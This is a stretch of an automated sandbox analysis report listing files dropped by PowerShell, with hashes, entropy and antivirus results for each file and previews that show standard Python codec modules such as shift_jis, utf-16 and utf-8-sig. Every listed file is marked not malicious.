                                                                                                                                                                                                              Preview:#..# shift_jis.py: Python Unicode Codec for SHIFT_JIS..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jis')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jis',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1098
                                                                                                                                                                                                              Entropy (8bit):4.636186915032078
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:njqMsOzff/XoRKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ocJxFplR:jqkwF62VJjRU8njOxLnrxLbrLKHJxTz
                                                                                                                                                                                                              MD5:0440951B33F486E65DB5176D5CF99851
                                                                                                                                                                                                              SHA1:D6269777856EC9BB88F7A0413A55EBCCE3BFBE17
                                                                                                                                                                                                              SHA-256:B806ADF317A9920E69A1DEB14C7F078F0D5A9BD26BD370C89492F4DD296AA52A
                                                                                                                                                                                                              SHA-512:A92FF2A9EB64C6E42E4CB808823E1B88CD760EC83EAB27BDAAB974152FB2B8DDC2288F800BE85A622F79304DADFD7E96DDEF86FED3434B73CC53967F873BBCEA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# shift_jis_2004.py: Python Unicode Codec for SHIFT_JIS_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jis_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jis_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=In
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1098
                                                                                                                                                                                                              Entropy (8bit):4.656971526890629
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nAqqOzff/Xo2KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9PcJxFplR:AqHw462VJjRU8njOxLnrxLbrLKCJxTz
                                                                                                                                                                                                              MD5:CBAB0DA456CE49672F8A5CDB79018312
                                                                                                                                                                                                              SHA1:A682827169185DA5BBA2B498BF0302B2EAE087A7
                                                                                                                                                                                                              SHA-256:16BE3CDC9EFA7C3A6EC5A683BC03BCAA9DBB41FCC70C92900130175A761A9D62
                                                                                                                                                                                                              SHA-512:EFE6CF1021E7FEEF474A3C0E0B346515410716DA6536488765803F2DBD1DA2A217F23F64484634C8EDDC149086F1AD82D563EB9A7C6319976FB852747CCCCF9D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# shift_jisx0213.py: Python Unicode Codec for SHIFT_JISX0213..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jisx0213')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jisx0213',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=In
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12607
                                                                                                                                                                                                              Entropy (8bit):4.621772981576072
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:WHhsuOTDvR2LUrXPLouhIAs2+ijLf00pC8i5I:zTojuhIAl0H8iG
                                                                                                                                                                                                              MD5:D9690A0F4A8779777A17C8E04C5EA6FF
                                                                                                                                                                                                              SHA1:F10E74D2FDC0BE0582B97094F50BF4A38320C6FA
                                                                                                                                                                                                              SHA-256:18AFE3A0FD28797D71762EAFFADC9822E0CB8832BE696AF2298F6727AB92627F
                                                                                                                                                                                                              SHA-512:48AEBA9D13106BECC3305F42FB4C0A9B9D3A5663C807C7B42FAC579229D9FD43E2F15BBE3AA9DB6C19216334F296D584308BB12D93C4D998D0AF607ABB621BAA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec tis_620 generated from 'python-mappings/TIS-620.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='tis-620',.. encode=Cod
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1348
                                                                                                                                                                                                              Entropy (8bit):4.667992147176458
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JldJcg5qSEH6e1cUe2e1cUeFMufKUeFhKUemUQWSJzWS09ZKj9EmIcJxlTpf:JldJ9ISo1ner1neKuhe5em6SJ6S0TK2M
                                                                                                                                                                                                              MD5:7C6EF4AB65DA0214127F4E70CB74D180
                                                                                                                                                                                                              SHA1:01D2D4FAE5C7C55DDD33CE3D5DB95BC56EA68E03
                                                                                                                                                                                                              SHA-256:E882AD26197F05AFB20980407787F77D18E234F562E6EC396B7D9DF3C7EEF5FC
                                                                                                                                                                                                              SHA-512:2DEC757B249BEC760DA00B5269D51C2F7ADEF574FD68A188B64304EB1B7974C84E0B4AB89A138764203D89231DFE76AA4784C466B384655B26D510FA58522E7E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python 'undefined' Codec.... This codec will always raise a ValueError exception when being.. used. It is intended for use by the site.py file to switch off.. automatic string to Unicode coercion.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. raise UnicodeError("undefined encoding").... def decode(self,input,errors='strict'):.. raise UnicodeError("undefined encoding")....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. raise UnicodeError("undefined encoding")....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. raise UnicodeError("undefined encoding")....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1350
                                                                                                                                                                                                              Entropy (8bit):4.660145850496412
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JDmSEHV0yWcBx1yWcB8MufQcBxCb+nh5cBiiUQWSJzWSmi1GcBX9ZKj9jQJxlTpf:JaSAE1uzWbp6SJ6SL1tBTKpQJxHf
                                                                                                                                                                                                              MD5:C939A021963EDD01807CDF57B08163D7
                                                                                                                                                                                                              SHA1:5549D399865582B0A802D950E8B3B7FA4474D726
                                                                                                                                                                                                              SHA-256:1D1372CF4F46E2F99820070B78563BD3EEED60FFC43A932B483CC7918F3DA5E9
                                                                                                                                                                                                              SHA-512:8BF2450C2A44B4ED7B9E901C425AD7BA114E9B946E69FF0DB36644DBD82BF85266EB487C373179F50DB983CE0A51A03E52F43539F92DBC9BF69D39F5DBAE7753
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python 'unicode-escape' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.unicode_escape_encode.. decode = codecs.unicode_escape_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.unicode_escape_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. def _buffer_decode(self, input, errors, final):.. return codecs.unicode_escape_decode(input, errors, final)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. def decode(self, input, errors='strict'):.. return codecs.unicode_escape_decode(input, errors, False
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5391
                                                                                                                                                                                                              Entropy (8bit):4.3113332789517
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:JgcgiEqCubuY5lRlE2GRCGEFdIXv5lLoQyLt6ofvBUpzdft0iL7+9WiV9lkip8IB:aruCouolRaRCRIhlL7yLt7vYfLL72blt
                                                                                                                                                                                                              MD5:2867E58C229EB66CE2FC8704F1E380D2
                                                                                                                                                                                                              SHA1:57CB01EF3A3CD16BCCB814C86A3B6DABC379B7C4
                                                                                                                                                                                                              SHA-256:FD85A9D634B6F3868D6777E2B0367643571B3E61111B87C79F65DF3F57C7ACB3
                                                                                                                                                                                                              SHA-512:7E08E1F9FFCF68123DA6B5B531ED0040AE652FC00DCCEAFCD2B4AF121CA627ECF7A4F9DC6AEB44EF8C040414F27BB3AC0B31FAB030A7BB6D5C2491CA5161CC12
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python 'utf-16' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs, sys....### Codec APIs....encode = codecs.utf_16_encode....def decode(input, errors='strict'):.. return codecs.utf_16_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.encoder = None.... def encode(self, input, final=False):.. if self.encoder is None:.. result = codecs.utf_16_encode(input, self.errors)[0].. if sys.byteorder == 'little':.. self.encoder = codecs.utf_16_le_encode.. else:.. self.encoder = codecs.utf_16_be_encode.. return result.. return self.encoder(input, self.errors)[0].... def reset(self):.. codecs.IncrementalEncoder.reset(self).. self.encoder = None.... de
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1079
                                                                                                                                                                                                              Entropy (8bit):4.776020747108792
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JMSEVyWuq1IjaatMufQBb+OyW80kzyWEzryW79ZKj9kJxFplR:JMS1q1I2aCuqEzSzhTKOJxTz
                                                                                                                                                                                                              MD5:71C7BEDB2761CE2BCD7D4AB422CF4F40
                                                                                                                                                                                                              SHA1:9BE6A38B88716031ED83825611C3B010284C3677
                                                                                                                                                                                                              SHA-256:16329B46D794F4D13B38A7A2540002E72E176D85237872CA3A24BF3C90D7665C
                                                                                                                                                                                                              SHA-512:D72E83FB2FD71EED49EC72F9B99B87A0341B2923091C6D92B5DEAB7C380418F8BFB868EE064A76FD321EBD2C2D8560A2559D76401730F199870374B4B555E35B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python 'utf-16-be' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_16_be_encode....def decode(input, errors='strict'):.. return codecs.utf_16_be_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_16_be_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_16_be_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_16_be_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_16_be_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-16-be',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1079
                                                                                                                                                                                                              Entropy (8bit):4.763394951954305
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:J+SEVyWMq1IjP8atMufQfb+OyWPy0kzyWuzryWP19ZKj9qJxFplR:J+SHq1I4aCuYizgzXTKQJxTz
                                                                                                                                                                                                              MD5:E34C5A24FE48A17FCBFC4335389F6C4E
                                                                                                                                                                                                              SHA1:4FD9811F688CE9ADDF6B1315600707C46BA02D56
                                                                                                                                                                                                              SHA-256:6D3B04F3ABD9FB6151FEE5CA0426C2E7ED2677EF1358C269747FF8946FFC02B9
                                                                                                                                                                                                              SHA-512:2FE8D6111B3A81F509BB67AB452CEDF9721501222F16E3CCDC4E412BF7BB2383317269ED4059E2C1E82434EF6830794A6EB8AA7DDA2E6230290A8027E601BB10
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python 'utf-16-le' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_16_le_encode....def decode(input, errors='strict'):.. return codecs.utf_16_le_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_16_le_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_16_le_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_16_le_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_16_le_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-16-le',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5279
                                                                                                                                                                                                              Entropy (8bit):4.273683297819166
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:g+tqC0buY5lRlzeRCGEFdIPv5lLoQwLt6ofvBUpzdf/0iL7+zykV9bkMpZ/ut1fA:DkCSuolRMRCRMhlL7wLt7vYfVL7qbbpd
                                                                                                                                                                                                              MD5:616CF58B40671374C8A7BB69A3EBC565
                                                                                                                                                                                                              SHA1:2F71BE2439277B332CC255B7E0B0F11AFF9AB090
                                                                                                                                                                                                              SHA-256:97F6038F368954DD48BE9B5FA41B1395A71FCA0271B0FEA69F8E16F9F6633775
                                                                                                                                                                                                              SHA-512:43D921D34974BA356A0AE3B650516B7E1108DBFB10618BAC22A0485A5AD1B55D73B1090F77C69C67ACD0C3BE231E4DBD02A32040BCF88FA646610C91F819F341
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:"""..Python 'utf-32' Codec.."""..import codecs, sys....### Codec APIs....encode = codecs.utf_32_encode....def decode(input, errors='strict'):.. return codecs.utf_32_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.encoder = None.... def encode(self, input, final=False):.. if self.encoder is None:.. result = codecs.utf_32_encode(input, self.errors)[0].. if sys.byteorder == 'little':.. self.encoder = codecs.utf_32_le_encode.. else:.. self.encoder = codecs.utf_32_be_encode.. return result.. return self.encoder(input, self.errors)[0].... def reset(self):.. codecs.IncrementalEncoder.reset(self).. self.encoder = None.... def getstate(self):.. # state info we return to the caller:.. # 0: stream is in natural order for th
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):967
                                                                                                                                                                                                              Entropy (8bit):4.64840879615024
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:g6VyWEq1IjsatMufQ3b+OyWi0kzyWWzryWF9ZKj9KJxFplR:gRq1IQaCusKzwzXTKYJxTz
                                                                                                                                                                                                              MD5:85519A8598572F85931621ACCB60DB87
                                                                                                                                                                                                              SHA1:2B7912D3F1D4042A0778C22C068A18A9AD00B990
                                                                                                                                                                                                              SHA-256:A3698A68287CC78323117D14BE3B0B40F46289A850EB06AA9A5328D44B2A30EF
                                                                                                                                                                                                              SHA-512:AAF1FB52FCB6BCE9D3E026BD4866149D48F5E2434A735DED9165C65A5FD4D0186CC44715A797A890F4E01C9E4CB44453BCA8D4BA6993B93811739CA80E86F5FA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:"""..Python 'utf-32-be' Codec.."""..import codecs....### Codec APIs....encode = codecs.utf_32_be_encode....def decode(input, errors='strict'):.. return codecs.utf_32_be_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_32_be_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_32_be_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_32_be_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_32_be_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-32-be',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):967
                                                                                                                                                                                                              Entropy (8bit):4.629711576470682
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:gEVyWWq1IjyatMufQpb+OyWE0kzyWczryWj9ZKj95WJxFplR:g5q1IeaCuG8zizhTKGJxTz
                                                                                                                                                                                                              MD5:6647D201D3BAD385BD7897DF02EC45ED
                                                                                                                                                                                                              SHA1:AADB093709162E4B5F9ABA0590235AFE3D96246B
                                                                                                                                                                                                              SHA-256:945AF03D1DA591640DE7176BEF879658594B399AC7BBE564D790893CA7B38A73
                                                                                                                                                                                                              SHA-512:CF7F010E0E199BD017636894D7B1B060E21D2ADF13D81BAE710046889D48604A01D05F10F1B1ACA8033F19E8254857A93334CBBF471E55FD58BD4888B190CE62
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:"""..Python 'utf-32-le' Codec.."""..import codecs....### Codec APIs....encode = codecs.utf_32_le_encode....def decode(input, errors='strict'):.. return codecs.utf_32_le_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_32_le_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_32_le_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_32_le_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_32_le_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-32-le',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):984
                                                                                                                                                                                                              Entropy (8bit):4.635801396513396
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JWyVyW6q1IjWatMufQVb+OyWg0kzyW4zryWH9ZKj9+5JxFplR:JWjq1IiaCu24zmzNTK85JxTz
                                                                                                                                                                                                              MD5:ECFD453A49D4C576E4F189CF6B23376C
                                                                                                                                                                                                              SHA1:70B61C19024F20BBC476C11D3CE95AA484225D09
                                                                                                                                                                                                              SHA-256:1BE7FC4C85EDAAB33427D3F1230D56B8A4B0D75566F726D9DFC50FACEA36688B
                                                                                                                                                                                                              SHA-512:F6AB67F17F586459362581DD894D3CAF62D67E283C075DFCD15B2D03E0AC79FF53E31853900A9EFF5E8778ECEC7AEE7A945EA55368D663FF82F657E7950B4A51
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python 'utf-7' Codec....Written by Brian Quinlan (brian@sweetapp.com)..."""..import codecs....### Codec APIs....encode = codecs.utf_7_encode....def decode(input, errors='strict'):.. return codecs.utf_7_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_7_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_7_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_7_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_7_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-7',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1047
                                                                                                                                                                                                              Entropy (8bit):4.729776202710733
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JgqSEVyW7yEq1IjPatMufQ7y3b+OyWR0kzyW7yWzryWc9ZKj9/JxFplR:J1SKyEq1IjaCuwyr5z1yWzeTKZJxTz
                                                                                                                                                                                                              MD5:F932D95AFCAEA5FDC12E72D25565F948
                                                                                                                                                                                                              SHA1:2685D94BA1536B7870B7172C06FE72CF749B4D29
                                                                                                                                                                                                              SHA-256:9C54C7DB8CE0722CA4DDB5F45D4E170357E37991AFB3FCDC091721BF6C09257E
                                                                                                                                                                                                              SHA-512:A10035AE10B963D2183D31C72FF681A21ED9E255DDA22624CBAF8DBED5AFBDE7BE05BB719B07573DE9275D8B4793D2F4AEF0C0C8346203EEA606BB818A02CAB6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python 'utf-8' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_8_encode....def decode(input, errors='strict'):.. return codecs.utf_8_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_8_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_8_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_8_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_8_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-8',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReade
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4263
                                                                                                                                                                                                              Entropy (8bit):4.440495855479389
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:JGJ9aCCIFyqPICuY5lRlDrwzRC35v5lLo3YCaLt3AvBNiLD1Lg9Ft1QYxTKB3:8J9vCIFTwCuolR9rwzRCJhlLIaLtQv+d
                                                                                                                                                                                                              MD5:99B035D3C80B206F86E525A4DB7704D3
                                                                                                                                                                                                              SHA1:5006274B7CC61564CF6839AC070631F788FD5FCB
                                                                                                                                                                                                              SHA-256:21A95BB95448F2F064F08AA2C89E843B87A20A5A13C45C6C47C288F2BE5219A4
                                                                                                                                                                                                              SHA-512:B19A6876EB04CD5739F99C7C0A07B2269E2EB9A72199A656149DD2B87A25EB0F9945CD9CAEFD2B7DA8756386468294493C6353645CB055343F008CDCFF115F4F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python 'utf-8-sig' Codec..This work similar to UTF-8 with the following changes:....* On encoding/writing a UTF-8 encoded BOM will be prepended/written as the.. first three bytes.....* On decoding/reading if the first three bytes are a UTF-8 encoded BOM, these.. bytes will be skipped..."""..import codecs....### Codec APIs....def encode(input, errors='strict'):.. return (codecs.BOM_UTF8 + codecs.utf_8_encode(input, errors)[0],.. len(input))....def decode(input, errors='strict'):.. prefix = 0.. if input[:3] == codecs.BOM_UTF8:.. input = input[3:].. prefix = 3.. (output, consumed) = codecs.utf_8_decode(input, errors, True).. return (output, consumed+prefix)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.first = 1.... def encode(self, input, final=False):.. if self.first:.. self.first = 0.. r
